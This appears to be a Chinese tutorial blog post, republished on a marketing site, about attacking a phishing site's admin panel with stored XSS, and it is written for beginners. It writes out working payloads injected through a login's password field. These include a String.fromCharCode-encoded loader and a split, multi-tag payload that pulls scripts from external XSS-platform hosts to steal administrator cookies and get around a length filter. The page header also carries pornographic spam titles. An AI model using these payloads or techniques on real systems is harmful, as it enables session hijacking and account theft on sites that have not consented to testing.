也可以看看我的第一篇:《攻破黑市" />

国产成人精品无码青草_亚洲国产美女精品久久久久∴_欧美人与鲁交大毛片免费_国产果冻豆传媒麻婆精东

15158846557 在線咨詢 在線咨詢
15158846557 在線咨詢
所在位置: 首頁 > 營銷資訊 > 網(wǎng)站運營 > 攻破黑市最流行的釣魚網(wǎng)站(第二彈)

攻破黑市最流行的釣魚網(wǎng)站(第二彈)

時間:2023-05-12 03:57:01 | 來源:網(wǎng)站運營

時間:2023-05-12 03:57:01 來源:網(wǎng)站運營

攻破黑市最流行的釣魚網(wǎng)站(第二彈):上次有人向我反映,我講的過于快了,不適合菜鳥看,所以這次我寫的相對來說比較詳細~ 這對于有基礎(chǔ)的人來說可能比較煎熬,哈哈。大家秒懂的部分可以跳過~~

也可以看看我的第一篇:《攻破黑市最流行的釣魚網(wǎng)站》。

這次的比較簡單:對一個目標網(wǎng)站進行白盒測試,

這是后臺

可以看到,這邊是一個釣魚網(wǎng)站

對目標進行XSS白盒測試

點擊領(lǐng)取禮包,這里會彈出一個登錄框

我們隨便輸入一個賬戶密碼

通過抓包修改里面的參數(shù)

目測,這里就兩個參數(shù)可以測試, 一個user 一個password

放上自己最常用的payload 在password 內(nèi)

user=123123112312&password=123123"><img/src=1 onerror=alert("1">//&submit=%E7%99%BB%E5%BD%95"> 是閉合標簽<img/src=1 onerror=alert("1"> 是彈窗//為注釋掉后面的語法

現(xiàn)在我們進入后臺查看,

可以看到,很明顯的,我們的img標簽已經(jīng)執(zhí)行成功了,但是沒有彈窗,這是為啥?

對其右擊-查看源碼

查看他的屬性,我們發(fā)現(xiàn),alert后面的語句沒有執(zhí)行? 那么,我們換個標簽試試

再次請求數(shù)據(jù)

user=123123112312&password=123123"><style/onload=alert(1)>//&submit=%E7%99%BB%E5%BD%95這次進到后臺查看

可以看到,這邊已經(jīng)成功彈窗了

然后就應(yīng)該開始構(gòu)造payload 啊~走起,引用我的XSS站點URL 構(gòu)造的payload 應(yīng)該為

“><img/src=1/>//紅色的”>部分為閉合前邊的標簽黃色的// 為注釋掉后面的語句<img/src=1/> 這句代碼主要就是引用我們XSS平臺的代碼,主要達到一個盜取對方cookie的效果

然后我們再一次提交數(shù)據(jù)

在password 參數(shù)里,也就是密碼處添加payload,

結(jié)果后臺數(shù)據(jù)沒有顯示。

憑著經(jīng)驗判斷,可能是對某個字符進行了過濾,但是我自己也不知道是哪個,所以只能不斷的測試 對payload編碼試試。

那么使用String.fromCharCode 函數(shù)進行轉(zhuǎn)換吧~~什么是String.fromCharCode函數(shù)轉(zhuǎn)換呢?打個比方~ 我們把alert("1") 進行轉(zhuǎn)換,

那么我們在 標簽輸入試試,

在頁面上顯示彈窗

那么我構(gòu)造的payload 就應(yīng)該為,

"><svg/onload=eval((String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,46,116,118,47,88,65,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59)))>//再次請求數(shù)據(jù),把這段payload 放到 password 參數(shù)里,

然后我們進入后臺查看

好像,應(yīng)該,或許成功了吧,我們查看源碼試試




不行, 后來我又試了上百種payload,最終發(fā)現(xiàn),這貨是在服務(wù)器端限制了字符數(shù)。。。。。。。。。。。。。。。 也就是說,我們用最短的payload 彈窗可以,但是如果需要引用 自己惡意站點的URL,就需要大量的代碼,這樣的話就”根本”的防止了我們構(gòu)造~

還好,我之前看過 劍心的 跨站拆分法 (在這里為他默哀3秒~)

何為跨站拆分?簡單理解,就是一大塊蛋糕放不進去冰箱,我們把它切成一小塊一小塊的放進去。

例子:

你們自己在腳本里輸入看看,最終的效果是什么

好的,現(xiàn)在我們做一個最簡單的測試

給變量a賦值為0;然后彈出變量a

現(xiàn)在我們把代碼一一的放入進入 輸入賬號密碼,抓包修改

在后臺查看下,

成功保存。

輸入賬號密碼,抓包修改,

輸入完,第二段代碼,讓著兩段疊加,那么他們就應(yīng)該彈窗了吧~

現(xiàn)在來開始構(gòu)造我們的站點吧~~

<script>z='document'</script> <script>z=z+'.write("'</script> <script>z=z+'<script'</script> <script>z=z+' src=ht'</script> <script>z=z+'tp://xss'</script> <script>z=z+'.sssie'</script> <script>z=z+'.com/F'</script> <script>z=z+'MD27h'</script> <script>z=z+'></sc'</script> <script>z=z+'ript>")'</script> <script>alert(z)</script> <script>eval(z)</script>逐個放進去即可 然后就拿到了對方的cookie

我把我在一個論壇里的XSS教程買了下來,我看了下,由易到難,不知道對大家有沒有幫助。

關(guān)鍵詞:魚網(wǎng),黑市,流行,攻破

74
73
25
news

版權(quán)所有? 億企邦 1997-2025 保留一切法律許可權(quán)利。

為了最佳展示效果,本站不支持IE9及以下版本的瀏覽器,建議您使用谷歌Chrome瀏覽器。 點擊下載Chrome瀏覽器
關(guān)閉